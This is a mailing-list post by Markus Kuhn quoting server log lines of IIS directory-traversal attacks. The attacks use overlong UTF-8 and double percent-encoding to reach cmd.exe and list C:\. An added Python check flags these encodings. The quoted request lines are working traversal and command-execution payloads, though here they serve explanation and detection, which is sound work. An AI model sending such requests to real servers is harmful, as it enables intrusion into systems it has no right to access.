For those of you still wondering what I was worried about a few years ago with regard to overlong UTF-8 sequences, here is an extract from our httpd log files:

  ...
  GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
  ...

Looks familiar? :)

Markus

P.S.: Has anyone an idea, which IIS worm performs the above HTTP vulnerability tests? Is it one of the later Nimda variants or something else?

--
Markus G. Kuhn, Computer Laboratory, University of Cambridge, UK
Email: mkuhn at acm.org, WWW: <http://www.cl.cam.ac.uk/~mgk25/>

--
Linux-UTF8: i18n of Linux on all levels
Archive: http://mail.nl.linux.org/linux-utf8/
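
Added example, not part of the original message: a small Python log check that flags the three encoding tricks visible in the extract above (overlong UTF-8 sequences, malformed sequences such as %c1%pc, and percent-escapes that survive a first decoding pass). The function names and labels are this example's own, and the 5- and 6-byte forms follow the original UTF-8 definition because they appear in the log.

```python
import re

_PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
# Smallest code point that really needs an n-byte sequence (original 6-byte UTF-8).
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}

def pct_decode(raw: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes such as %pc stay as they are."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw)

def leading_ones(b: int) -> int:
    n = 0
    while b & (0x80 >> n):
        n += 1
    return n

def scan_utf8(data: bytes):
    """Return (overlong, malformed); overlong lists (offset, code_point) pairs."""
    overlong, malformed, i = [], False, 0
    while i < len(data):
        n = leading_ones(data[i])
        tail = data[i + 1:i + n]
        if n == 0:                                  # plain ASCII byte
            i += 1
        elif 2 <= n <= 6 and len(tail) == n - 1 and all(t & 0xC0 == 0x80 for t in tail):
            cp = data[i] & (0x7F >> n)              # payload bits of the lead byte
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            if cp < MIN_CP[n]:                      # fits in fewer bytes: overlong
                overlong.append((i, cp))
            i += n
        else:                                       # stray or truncated sequence
            malformed, i = True, i + 1
    return overlong, malformed

def classify(path: str) -> set:
    once = pct_decode(path.encode("latin-1"))
    overlong, malformed = scan_utf8(once)
    findings = set()
    if overlong:
        findings.add("overlong-utf8")
    if malformed:
        findings.add("malformed-utf8")
    if pct_decode(once) != once:                    # a second pass still changes it
        findings.add("nested-percent-encoding")
    return findings

if __name__ == "__main__":
    # Paths taken from the log extract above, plus one constructed benign path.
    for p in ["/scripts/..%e0%80%af../winnt/system32/cmd.exe",
              "/msadc/..%%35%63../winnt/system32/cmd.exe", "/docs/caf%c3%a9.html"]:
        print(p, sorted(classify(p)))
```

The check rejects on the encoding form alone, whatever character the sequence would decode to: %e0%80%af yields U+002F, while %c1%af yields U+006F, and both are flagged.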
